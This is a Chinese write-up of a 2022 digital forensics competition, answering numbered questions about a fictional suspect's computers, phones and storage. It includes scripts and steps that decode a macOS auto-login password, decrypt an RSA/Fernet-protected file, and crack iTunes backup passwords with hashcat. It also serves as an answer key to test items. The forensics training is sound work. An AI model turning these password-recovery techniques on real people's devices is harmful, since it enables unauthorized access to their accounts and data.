D. Subtotal = 0.0253 ETH
E. Good LuckD
120
120. [填空题]在朗尼的计算机旁找到 'MetaMask' 的密码是 'opensea741',找出朗尼计算机里的 'MetaMask' 中有多少加密货币余额? (不要输入 '.',以阿拉伯数字回答,如 0.137 需回答 0137) (2分)
00247
121
121.朗尼的计算机曾用什么电邮地址登录电邮帐号? (不要输入答案中的 '@' 及 '.',以大写英文及阿拉伯数字回答,如 name@mail.com,需回答 NAMEMAILCOM)这里邮箱 显示 @
122
127 什么电邮账号曾接收过上述电邮地址发送的电邮?(不要输入答案 中的 '@' 及 '.',以大写英文及阿拉伯数字回答,如name@mail.com,需回 答 NAMEMAILCOM123
123. [多选题]承上题,上述的电邮附件包含哪些类型的档案? (3分)124
124. [填空题]上述电邮附件里的文件,被遮蔽的英文单字是什么? (以大写英文回答) (3分)126
125. [填空题]根据上述电邮附件里找到的回复种子 (Recovery Seed),计算朗尼在 'MetaMask' 使用的以太币 (Ethereum) 地址。(提示:BIP-44 derivation path = m/44'/60'/0'/0/0) (以大写英文及阿拉伯数字回答) (3分)127
127. [单选题]朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭? (1分)
A. 荃湾
B. 湾仔
C. 九龙城
D. 九龙塘
A
128
128. [填空题]朗尼手机的 'WhatsApp' 号码是什么? ( 号码 ) @s.whatsapp.net? (以阿拉伯数字回答) 85259814785(1分)85259814785
129
129. [多选题]朗尼的手机曾连接以下哪一个WIFI网络? (2分)
A. taiiphone
B. rooneyhome
C. Function Room
D. TP-LinkAC
130
130. [单选题]朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ? (2分)
A. abcd5678
B. aaaa0000
C. rooney111
D. rdfu1234D
王景浩
17
17. [单选题]王景浩的USB记忆棒里有一个 'Data' 文件夹 (Folder),它存有哪一种类型的密钥文件? (1分)
A. pem
B. cer
C. crt
D. key
E. 以上皆非刚刚拿到usb我也傻了 要怎么取证呢 想到直接挂载不就好了
这里可以看到 key保存为 PEM类型 所以选E
18
18. 承上题,‘Data’文件夹里有一个被加密了的档案,它是被哪一种类型的密钥文件?
A. Symmetric
B. PGP
C. Twofish
D. RSA
E. Triple DES这里 我们已经知道了是D 但是这里还要注意 其还使用了一个Ferent
我们可以去搜搜看看这是什么加密
还有A
19 通过加密算法进行解密
19. 承上题,被加密的档案属于哪一个类型(File type)¶
A:exe; B:ods; C:rtf; D:sql; E:以上皆非这里我们需要通过编写 解密脚本实现
from cryptography.fernet import Fernet
import rsa
with open('P1','rb') as h:
K = rsa.PrivateKey.load_pkcs1(h.read())
with open('minecraft.exe','rb') as ef:
encrypt_key = ef.read(128)
encrypt_word = ef.read()
decrypted_key = rsa.decrypt(encrypt_key, K)
cipher = Fernet(decrypted_key)
decrypted_word = cipher.decrypt(encrypt_word)
with open('1.txt','wb') as f:
f.write(decrypted_word)
发现是数据库 所以是.sql
D
20
20. [多选题]承上题,找出以下哪一个名字出现在该档案里? (3分)
A. Armand To
B. Adam Smasher
C. Beverly Kot
D. Huma Chan
E. 以上皆非
AC
57 MAC取证
57. [单选题]王景浩的计算机使用什么文件系统 (File System) ? (1分)
A. exFAT
B. APFS
C. HFS
D. HFS+这里需要去取证计算机系统 这里我们能发现是MAC 我们去搜一下 貌似可能是B 但是取证一下看看
这里是hfsp
不知道是什么 然后我们去看看取证大师
D
58
58. [单选题]王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)
A. 10.4.11
B. 10.9.5
C. 10.10.5
D. 10.11.6
D
59
59. [填空题]王景浩的计算机当前有多少个用户 (包括访客 'Guest' )? (以阿拉伯数字回答) (1分)
之前去看 怎么会有 90个 然后发现 其实系统也算在里面
所以我们筛选出前面没有_的 6个
60
60. [填空题]王景浩的计算机里有一个用户被删除,被删除的用户名称是什么? (以大写英文回答) (1分)这里貌似火眼看不了 我们去取证大师看
BROTHER
61
61. 王景浩的计算机有多少个 '聚焦' 的搜索记録 (Spotlight Search) ?¶这里我没咋明白 主要就是去搜 Spotlight
9
62
62. 当用户设置了自动登录 (Auto Login) 后,王景浩计算机的操作系统会产生哪个档案?
A. manifest.plist
B. info.plist
C. PasswordPanel.strings
D. kcpasswordhttps://www.cnblogs.com/zhwer/p/15263277.html
D
63 解密MA密码
63. 王景浩计算机的登录密码 (Login Password) 是什么?¶
A. 1qa@WS3ed B. 3ed$RF5tg C. 5tg^YH7uj D. 2ws$RF6yh`这里我们要顺着上一题 既然这里要配置 那么就肯定写在里面了 我们去看看
xway yyds 直接把镜像拖进去就可以了
直接就解析出来了D
这里附上大佬的脚本
#key是固定的值
key = [125, 137, 82, 35, 210, 188, 221, 234, 163, 185, 31]
length = len(key)
#pwd是kcpassword文件中的16进制值的10进制
pwd = [79, 254, 33, 7, 128, 250, 235, 147, 203, 185, 120, 187]
end = False
kcpassword = []
for i in range(len(pwd)):
if pwd[i] ^ key[i % length] == 0:
end = True
if end == False:
kcpassword.append(str(chr(pwd[i] ^ key[i % length])))
print(''.join(map(str, kcpassword)))
64
64. 在王景浩的计算机里,他最后使用哪个电邮地址登录 'iCloud' 账号?这里需要去看登入icloud账号 我们去看看 要么就是通过 网站 要么就是通过app
然后我们搜索icloud 发现邮箱中存在信息 这里是说明是这个邮箱登入了 icloud web 服务
kinghoo0w0@gmail.com
火眼可以直接取证出来
65 通过 manifest.plist 查看版本
65. 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本?
A. 12.5.6
B. 15.4
C. 15.5
D. 16.0.3这里貌似取证大师取出来了
这里可以去学习看文件 我们去源文件中的manifest文件查看
可以发现存在C
AC
66
66. [填空题]王景浩曾经将一台 iPhone 6 连接他的计算机,请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
通过蓝牙链接的话是这个 但是如果通过 airdrop
67 查看备份密码
67. 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案?
A. Info.plist
B. privacy.json
C. Manifest.plist
D. PasswordPanel.strings这里可以知道 manifest是 苹果文件的存储信息
68
68. 以下哪种工具可以用作破解密码?¶
A. Passware B. John The Ripper C. HashCat D. Password Recovery Toolkit这里都可以进行密码爆破
69 hashcat 爆破itunes backup的参数
69. [多选题]通过 'hashcat' 破解 'iTunes Backup' 密码需要制订一个 'txt' 档案,若该备份的手机iOS版本是10以上,需要按照下列哪个提示字符 (String) 的数据去制订这个 'txt' 档案? (3分)
A. WPKY
B. ITER
C. SALT
D. DPIC
E. DPSL Less then iOS 10:
$itunes_backup$*<ver>*<WPKY>*<ITER>*<SALT>**
iOS 10 or later:
$itunes_backup$*<ver>*<WPKY>*<ITER>*<SALT>*<DPIC>*<DPSL>ABCDE
70 passware爆破密码
70. [填空题]王景浩采用了4位数字加密了他的iPhone XR的备份,分析它的密码是什么? (以阿拉伯数字回答) (3分)这个还是很简单的
直接指定4位密码爆破即可
2022
71 查看3D打印内容
71. 最后一次连上王景浩计算机的3D打印机的IP地址是什么?我们看看3D打印 有可能是蓝牙吧
结果是wifi 然后我们去看时间
然后我们去看看访问 的ip 3d打印的web地址
1014140
72
72. 3D打印机最后一次在王景浩的计算机尝试打印的时间?这不就是最后一次链接wifi的时间吗 那么就是上题那个了
73 3D打印的文档问题
73. [单选题]最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)
A. CE3_balljoint_extender.gcode
B. um3-penguin-real-mini-keychain-merged-tpu.gcode
C. CE3_Prancer.gcode
D. CE3_2020-psu-atx-mount.gcode
3D 打印需要通过文档打印 我们查看最近访问的文档 发现是D
74
74. [单选题]王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)
A. 百度
B. 谷歌
C. 360
D. Safari这里貌似都是通过大多数是什么来判断的 这里都是google 所以选B
75
75. [单选题]分析王景浩计算机的数据,王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)
A. bc1quw… ...zpzjzt
B. bc1qm… ...5f7n9g
C. bc1q79… ...h4sq52
D. bc1qsl… ...je7hkk这里开始到比特币了 我们查看一下内容 发现邮箱里存在 交流
A
76
76. [单选题]AGC公司员工 'Carson' 有一个由公司发给他的电邮账户,分析王景浩的计算机数据并找出 'Carson' 的电邮账户密码。(2分)
A. AGC2020@pw
B. AGC2012@PW
C. AGC2020@hkg
D. AGC2021@PW
A
77 查看 messageid
77. [填空题]王景浩曾经冒充AGC公司员工 'Carson' 发送电邮给AGC 客户,这封电邮的 'Message-ID' 是什么? 回答它的首8位数值。(以大写英文和阿拉伯数字回答,如 4GEF90GD) (2分)
之前我们可以看到是修改然后勒索 所以这里就是 勒索的这个 004001d8
78
78. 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据?
A. Teamviewer
B. OpenVPN
C. Remote Desktop Manager
D. Tor Browser
存在 teamviewer 就是远控软件
然后通过 取证大师看 就可以获取到 tor
79
79. [多选题]王景浩在AGC公司盗取了下列什么类型的档案? (2分)
A. ost
B. xlsx
C. jpg
D. docx这里需要去公司的pc中查看 传输内容
AB
80 查看openvpn 获取ip地址
80. [填空题]王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN),这个VPN的IP地址是什么? (不要输入答案中的 '.',以阿拉伯数字回答) (2分)
81 配置蓝牙访问mac地址
81. 装置 '「KingHoo」的iPhone' 的蓝牙媒体访问控制地址 (MAC Address) 是什么?54-2b-8d-c8-8a-a7
82
82. [单选题]王景浩何时将 '小宝' 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)导出XR 取证
83 挂载备份文件
83. 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到 多少存款?
A. HKD298.8
B. HKD344.7
C. HKD396
D. HKD543
E. HKD465.1这里是查看短信 但是我这边没有取证出来 不知道为什么 哦 取错了@_@
B
84
84. [单选题]王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)
A. KEF
B. EDIFIER
C. BOSE
D. YAMAHA
E. Bowers & Wilkins我们去看看收藏?
最后是在书签这里找到了
D
85
85. [单选题]王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机,当天试飞的地点在哪里? (2分)
A. 大埔海滨
B. 启德
C. 数码港
D. 西环
E. 将军澳这里地址 我们看看是不是iphone记录的
直接通过火眼的定位可以访问到了
D
86 大疆飞行日志分析
86. 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久?这里我们还需要通过物联大师来实现取证
因为无人机通过苹果手机记录 肯定就有 时间的
找到了 大疆无人机 我们看看能不能导出访问
87
87. [多选题]王景浩用 iPhone XR 拍了一张照片'IMG_0012.HEIC',那照片什么地方曾被修改? (3分)
A. 拍摄时间
B. 经纬度
C. 时区
D. 档案名称
E. 拍摄装备这里有点蒙蔽 不知道怎么弄
88
承上题,那张照片修改后的经纬度是什么96 计算存储容量
96. [填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)这里是取证sd卡
97
97. [单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯,记忆卡共有多少个分区 (Partition) ? (1分)2
98 查看磁盘标识符
98. [单选题] 检视记忆卡上硬盘分区表资讯,第二个分区的分区代码 (Partition Code) 是什么? (1分)
A. 07
B. AF
C. 0C
D. 2B
E. 01FTK挂载 然后通过 分区助手查看即可
99
99. [多选题] 记忆卡的档案不能被读取,记忆卡受损的原因包括? (2分)
A. 目录项结构 (Directory Entry) 受损
B. 启动扇区表 (Master Boot Record) 受损
C. 文件分配表 (File Allocation Table - FAT) 受损
D. 引导扇区 (Boot Sector) 受损
E. 以上各项皆是
百度搜
AB
100 修复sd卡
100 承上题, 通过分析及手动恢复还原, 记忆卡里有多少个受损的情况出现?首先这里了解一下
2022美亚杯团体赛 - XDforensics-Wiki
首先 分区正常识别了 MBR就没有受损
但是第二分区的内容无法识别 所以应该是第二分区的 DBR受损现在我们知道了是第二分区的 DBR受损了
所以我们开始修复 定位到 第二分区
然后我们去搜 5553这个段 发现存在 8个
然后我们可以通过恢复大师 一次性直接恢复了
101
101.[多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案,它的SHA-256哈希值是 ‘F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF’。该档案显示了哪些影像? (2分)
A. 人
B. 山
C. 汽车
D. 交通灯
E. 天空
然后这里发现了 其实是盘古石也可以直接获取 sd修复后的 但是这个通过sha256获取值 貌似比较难
这道题确实无法实现 ,不修复镜像的话做不了。。。
102
102.[单选题] 检视记忆卡的数据,在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中,曾经出现哪一个IP地址? (2分)
A. 61.238.217.108
B. 155.137.190.123
C. 192.168.1.66
D. 185.200.100.242
E. 213.104.156.111我们去看看 我们看这个时间里的内容
D
103
103.[填空题] 恢复还原后的记忆卡中,第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)取不出来 失败
104
104.[填空题] 记忆卡第一个文件系统中有一个视频档,它的SHA-256哈希值是 ‘847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19’,这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么?352失败咯
105
105 经过手动恢复还原后记忆卡的 SHA-256 哈希值是什么?
